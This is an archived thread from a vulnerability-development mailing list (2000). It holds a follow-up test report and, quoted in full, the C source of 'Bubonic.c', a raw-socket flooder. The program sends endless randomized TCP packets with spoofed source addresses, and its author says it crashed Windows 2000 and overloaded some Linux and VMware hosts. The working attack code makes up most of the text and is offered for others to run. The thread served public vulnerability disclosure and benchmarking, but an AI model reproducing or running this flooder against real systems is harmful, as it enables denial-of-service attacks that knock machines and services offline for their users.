Vulnerability Development mailing list archives
Re: Win2k & Linux DoS
From: Wolfgang Gassner <wulfmen () HOTMAIL COM>
Date: Mon, 28 Aug 2000 10:08:09 GMT
I played around a little with Bubonic.c and realized the following: Winnt 4.0 SP6: CPU Load at 60 %, nothing more, but tested on LAN and not over the Net! Solaris 7.0 on Ultra: CPU Load on around 40,nothing more, but tested on LAN and not over the Net! Linux(Suse6.2,6.4) No problem at all! VMWARE 1.0 b.194(Suse6.2 on NT) BINGO !! CPU Load 100%, VMWARE not working until ending flooding! My tests were all done over Lan! cu
From: "J. Oquendo" <intrusion () ENGINEER COM> Reply-To: "J. Oquendo" <intrusion () ENGINEER COM> To: VULN-DEV () SECURITYFOCUS COM Subject: Win2k & Linux DoS Date: Fri, 25 Aug 2000 11:50:24 -0400 MIME-Version: 1.0 X-Originating-IP: 63.144.153.254 Received: from [207.126.127.68] by hotmail.com (3.2) with ESMTP id MHotMailBB702EF20072D82197B9CF7E7F449C280; Fri Aug 25 14:25:22 2000 Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68])by lists.securityfocus.com (Postfix) with ESMTPid 8E3161F72C; Fri, 25 Aug 2000 10:22:24 -0700 (PDT) Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM (LISTSERV-TCP/IP release 1.8d) with spool id 12219647 for VULN-DEV () LISTS SECURITYFOCUS COM; Fri, 25 Aug 2000 10:22:10 -0700 Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by lists.securityfocus.com (Postfix) with SMTP id DFE7D1EEB9 for <vuln-dev () lists securityfocus com>; Fri, 25 Aug 2000 08:51:45 -0700 (PDT) Received: (qmail 11891 invoked by alias); 25 Aug 2000 15:52:50 -0000 Received: (qmail 11886 invoked from network); 25 Aug 2000 15:52:50 -0000 Received: from rmx441-mta.mail.com (165.251.48.44) by mail.securityfocus.com with SMTP; 25 Aug 2000 15:52:50 -0000 Received: from web303-mc.mail.com (web303-mc.mail.com [165.251.48.164]) by rmx441-mta.mail.com (8.9.3/8.9.3) with SMTP id LAA01904; Fri, 25 Aug 2000 11:50:30 -0400 (EDT) From owner-vuln-dev () SECURITYFOCUS COM Fri Aug 25 14:27:43 2000 Approved-By: BlueBoar () THIEVCO COM Delivered-To: vuln-dev () lists securityfocus com Delivered-To: vuln-dev () securityfocus com X-Mailer: mail.com Message-ID: <383928042.967218630176.JavaMail.root () web303-mc mail com> Sender: VULN-DEV List <VULN-DEV () SECURITYFOCUS COM> X-To: bugtraq () securityfocus com Greetings everyone. While tampering with random codes when building a theoretical tool I managed to crash my Windows2000 laptop by randomizing TCP settings. At first it wasn't a big deal since MS has gotten me used to seeing error codes with dumps for just about anything. Seems this code which was in no way specified to attack any specific OS brings the load up to extreme levels and is not limited to Win2K either. Written on an Ultra5 running Linux (zoot) I managed to drive this load up high after about 3 minutes forcing the machine to lag drastically. So in essence I give to you Bubonic.c maybe someone else can benchmark it and figure out whats going on. Error code received during thw WinCrash was: STOP 0x00000041 (0x00001000,0x00001279,0x0000042a,0x00000001) MUST_SUCCEED_POOL_EMPTY -------- SNIP TO CODE -------- /* * Bubonic.c lame DoS against Windows 2000 machines * and certain versions of Linux (worked against an Ultra5 * running Redhat Zoot. Should compile under anything. * Randomly sends TCP packets with random settings, etc. * Brings the load up causing the box to crash with * error code: * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001) * MUST_SUCCEED_POOL_EMPTY * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED. * WEE MULTICODE... www.antioffline.com/daemonic.c * shouts... hrmm fsck it why not... * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian, * qwer7y, m3th, god-, tattooman, spikeman, and my wife. * Can't forget security staff all over the place. * Logs for the packets sent at www.antioffline.com/logged * Windows2K screen shots at www.antioffline.com/loads.html */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, ip_v:4; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; u_long saddr, daddr; }; struct tcp_hdr { u_short th_sport; u_short th_dport; u_long th_seq; u_long th_syn; u_int th_x2:4, th_off:4; u_char th_flags; u_short th_win; u_short th_sum; u_short th_urp; }; struct tcpopt_hdr { u_char type; u_char len; u_short value; }; struct pseudo_hdr { u_long saddr, daddr; u_char mbz, ptcl; u_short tcpl; }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short bgport, bgsize, pps; u_long radd; u_long sradd; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname); fprintf(stderr, "Ports are set to send and receive on port 179\n"); fprintf(stderr, "dst:\tDestination Address\n"); fprintf(stderr, "src:\tSource Address\n"); fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n"); fprintf(stderr, "num:\tpackets\n\n"); exit(1); } inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s fucknut\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = rand(); packet.ip.ip_id = radd; packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = radd; packet.tcp.th_flags = random(); packet.tcp.th_win = 65535; packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 0; packet.tcp.th_urp = random(); packet.tcp.th_dport = random(); cksum.pseudo.daddr = sradd; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = random(); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = sradd; s_in.sin_port = packet.tcp.th_dport; for(i=0;;++i) { if( !(i&0x3FF) ) { packet.tcp.th_sport = rand(); cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd; packet.tcp.th_flags = random(); packet.tcp.th_ack = rand(); } else { packet.tcp.th_flags = rand(); packet.tcp.th_ack = rand(); } ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!bgport) s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } int main(int argc, char *argv[]) { int on = 1; printf("Bubonic -- sil () antioffline com\n\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nFinding host\n"); fflush(stdout); radd = lookup(argv[1]); bgport = atoi(argv[3]); bgsize = atoi(argv[4]); sradd = lookup(argv[2]); printf("AntiOffline -- Putting the Hero in Heroin\n"); flooder(); return 0; } ______________________________________________ FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup << bubonic.c >>
_________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com.
Current thread:
- Win2k & Linux DoS J. Oquendo (Aug 25)
- <Possible follow-ups>
- Re: Win2k & Linux DoS J. Oquendo (Aug 25)
- Re: Win2k & Linux DoS Vitaly McLain (Aug 26)
- Re: Win2k & Linux DoS Wolfgang Gassner (Aug 28)